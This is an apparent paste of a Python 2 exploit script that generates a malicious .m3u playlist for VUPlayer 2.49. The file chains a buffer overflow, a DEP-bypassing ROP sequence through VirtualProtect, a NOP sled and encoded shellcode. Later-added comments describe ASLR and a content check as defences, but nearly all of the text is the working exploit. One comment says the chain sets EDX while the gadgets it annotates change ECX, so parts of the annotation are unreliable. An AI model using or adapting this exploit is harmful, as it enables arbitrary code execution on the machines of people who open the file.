AndrewHaxalot

VUPlayer 2.49 - (.M3U) Universal Buffer Overflow DEP Bypass

Dec 16th, 2013
# VUPlayer 2.49 (.M3U) Exploit(Universal buffer overflow/DEP bypass)
# Download: http://vuplayer.com/
# Tested on Wind0ws XP SP3 DEP:OptOut
# Author: Lu_c_fer ------>>> Lu_c_fer@aol.com , Twitter.com/lu_cif_er (feel free to tell me your ideas!! :))

# All the Gadgets are from APP's DLLs(I could only use the addresses that doesnt start with null)

# NOTE(review): proof-of-concept file generator. The only thing this script
# does is write one .m3u playlist to the current directory; it does not run
# the player, touch the network or take any argument.
#
# Every gadget address below is a fixed offset inside the player's bundled
# BASS*.dll modules (per the bracketed comments), so the chain is only valid
# for that exact build when those modules load at their preferred base
# (Windows XP has no ASLR, which is what the "universal" claim rests on).
# From the defensive side that is the lesson of the paste: DEP on its own is
# not a sufficient mitigation when the process maps non-relocated modules;
# ASLR on every loaded module (or mandatory ASLR) invalidates each hard-coded
# address and breaks the chain.
#
# The script is written as Python 2 (a str literal is used as raw bytes and
# written through a text-mode file handle).

import struct

# Output artefact: the crafted playlist.
p = open("Exploit_VirtualProtect.m3u", "w")

# Filler that precedes the overwritten return address; the 1012-byte offset
# comes from the author's testing and cannot be verified from this file.
crash = "\x41" * 1012

# Opaque shellcode bytes exactly as pasted; what they do is not
# determinable from this file and is intentionally not described here.
sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41")

# Each struct.pack('<L', ...) emits one little-endian 32-bit value: either a
# gadget address in a bundled DLL or a constant that the preceding gadget
# pops. The per-line comments are the author's gadget annotations.

#---------------------------Setting 0x00000201 into EBX----------------------------
rop = struct.pack('<L',0x10015f77) # POP EAX # RETN
rop += struct.pack('<L',0x5f5f01ff)
rop += struct.pack('<L',0x1001e453) # SUB EAX,5F5EFFFE # RETN 0x04
rop += struct.pack('<L',0x1003a084)
rop += struct.pack('<L',0x42424242)
rop += struct.pack('<L',0x1001033f) # INC EAX # RETN
rop += struct.pack('<L',0x100110ff) # POP EBX # RETN [BASS.dll]
rop += struct.pack('<L',0xffffffff) #
rop += struct.pack('<L',0x10015ef2) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN

#---------------------------Setting the pointer to the VirtualProtect into ESI----------------------------

rop += struct.pack('<L',0x10015f77) # POP EAX # RETN
rop += struct.pack('<L',0x10109270) # ptr to &VirtualProtect() [IAT BASSWMA.dll]
rop += struct.pack('<L',0x1001eaf1) # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
rop += struct.pack('<L',0x10030950) # XCHG EAX,ESI # RETN [BASS.dll]

#---------------------------Setting 0x00000040 into EDX(*******TRUST ME IT WAS THE ONLY WAY!!! :)******)----------------------------
rop += struct.pack('<L',0x1004041c) # POP EDX # RETN [BASS.dll]
rop += struct.pack('<L',0xffffffff)
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
# ECX is now 0x00000040


rop += struct.pack('<L',0x10010157) # POP EBP # RETN [BASS.dll]
rop += struct.pack('<L',0x1010539f) # & jmp esp [BASSWMA.dll]

rop += struct.pack('<L',0x10601007) # POP ECX # RETN [BASSMIDI.dll]
rop += struct.pack('<L',0x101087c3) # &Writable location [BASSWMA.dll]

rop += struct.pack('<L',0x100190b0) # POP EDI # RETN [BASS.dll]
rop += struct.pack('<L',0x1003a084) # RETN (ROP NOP) [BASS.dll]

rop += struct.pack('<L',0x10015fe7) # POP EAX # RETN [BASS.dll]
rop += struct.pack('<L',0x90909090) # &Writable location

rop += struct.pack('<L',0x1001d7a5) # PUSHAD # RETN [BASS.dll]

nop = "\x90"*40

# Final layout: filler, ROP chain, NOP sled, shellcode.
# Detection note: no legitimate playlist entry is a ~1 KiB run of a single
# byte followed by non-printable data; a content check on .m3u entry length
# and character class would flag this file before the player ever parses it.
payload = crash + rop + nop + sc


p.write(payload)
p.close()